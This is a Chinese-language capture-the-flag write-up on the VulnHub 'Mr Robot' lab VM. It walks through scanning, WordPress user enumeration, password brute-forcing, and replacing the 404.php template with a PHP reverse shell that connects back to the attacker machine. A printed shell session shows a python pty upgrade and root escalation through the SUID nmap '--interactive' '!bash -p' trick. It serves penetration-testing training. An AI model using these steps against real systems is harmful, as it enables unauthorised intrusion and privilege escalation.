前言

靶機主題來自美劇《黑客軍團》，這是一部傳達極客精神和黑客文化的上佳作品，不同于《硅谷》的搞笑風格，這部劇的主角Eliot患有精神分裂，整部劇的情節都較為壓抑，有點類似于電影《搏擊俱樂部》中雙重人格的斗爭。
雖然有影視色彩的加成，但是劇中的黑客技術細節還是足夠真實的，起碼符合常規的入侵滲透思路，強烈推薦該劇。
本次靶機有三個flag，難度在初級到中級，非常適合新手訓練學習，不需要逆向技術，目標就是找到三個key，并且拿到主機root權限。

 
環境配置
靶機下載地址：https://www.vulnhub.com/entry/mr-robot-1,151/
我使用的是VMware，導入ova文件，NAT方式連接后靶機自動獲取IP
本次實戰：
靶機IP：192.168.128.142
攻擊機IP：192.168.128.106
 
實戰演練
nmap開路，IP發現：

端口發現，服務版本探測：
nmap -sV -O 192.168.128.142

開啟了三個端口，發現web端口：80,443


查看源碼沒有發現可用信息，用dirb跑目錄：


發現有robots.txt文件，訪問http://192.168.128.142/robots.txt

發現兩個文件，訪問發現第一個目錄里是一個密碼字典，第二個像是一個密碼哈希，這是第一個key
073403c8a58a1f80d943455fb30724b9



密碼哈希無法爆破，字典也先放著后面用，現在用nikto掃描，看看有沒有可用漏洞：

發現有wordpress服務，之前dirb掃目錄也發現了wordpress登錄頁面
http://192.168.128.142/wp-login

發現wordpress服務，用wpscan掃描網站，只有登錄頁面，并沒有發現什么可用漏洞

在登錄頁面隨便輸入之前字典中的用戶，發現可以枚舉用戶名：

用burp枚舉出了兩個用戶名：

用elloit作為用戶名，再掛上這個字典跑密碼：

跑了好久，終于跑出密碼：ER28-0652，字典實在太大了，對字典做了篩選為了截圖方便就把重新跑了一遍

接下來就是獲取權限了，登陸之后，依次點擊apperance>editor>404.php

在kali找到php-reverse-shell.php，將其覆蓋到404.php更改監聽端口，IP

攻擊機上監聽此端口，訪問http://192.168.128.142/234543658，任意不存在頁面觸發shell

執行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 獲得一個更加穩定的shell

接下來查看靶機密碼文件：

發現沒法利用，先放一放。再看看其他目錄，找到一個密碼的md5散列.

拿出來破解:https://hashkiller.co.uk/md5-decrypter.aspx
abcdefghijklmnopqrstuvwxyz

用得到的密碼登錄robot

拿到第二個key，并且又拿到一個加密哈希，估計這個是root用戶的密碼
提升權限，但是沒有成功，只能想別的辦法
最后找到一個辦法，用nmap執行root權限

nmap產生了一個root權限的新shell


代碼如下：
daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/$ pwd
pwd
/
robot@linux:/$ cd /home
cd /home
robot@linux:/home$ ls
ls
robot
robot@linux:/home$ cd robot
cd robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot@linux:~$ find / -user root -perm -4000 2>/dev/null
find / -user root -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$ /usr/local/bin/nmap —version
/usr/local/bin/nmap —version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:~$ nmap —interactive
nmap —interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h  for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !bash -p
!bash -p
bash-4.3# whoami
whoami
root
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 32
drwx——— 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw———- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r—r— 1 root root 3274 Sep 16 2015 .bashrc
drwx——— 2 root root 4096 Nov 13 2015 .cache
-rw-r—r— 1 root root 0 Nov 13 2015 firstboot_done
-r———— 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r—r— 1 root root 140 Feb 20 2014 .profile
-rw———- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
bash-4.3# ls
ls
firstboot_done key-3-of-3.txt
成功拿到第三個key：
04787ddef27c3dee1ee161b21670b4e4
拿到靶機root權限，game over。
 
總結
這個靶機的難度并不大，遇到的難點：
1.使用 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 可以獲得一個穩定的shell，這個在實際滲透中用處也很大
2.用了很多辦法，一直拿不到root權限，查了很多資料發現了nmap自帶的提權腳本，這個技能get
3.這個靶機只開了web端口，ssh應該也是可以觸發的，大牛們可以嘗試
4.思路就是通過web頁面漏洞拿下了整個主機，wp提權思路也很多，大家也可以換思路滲透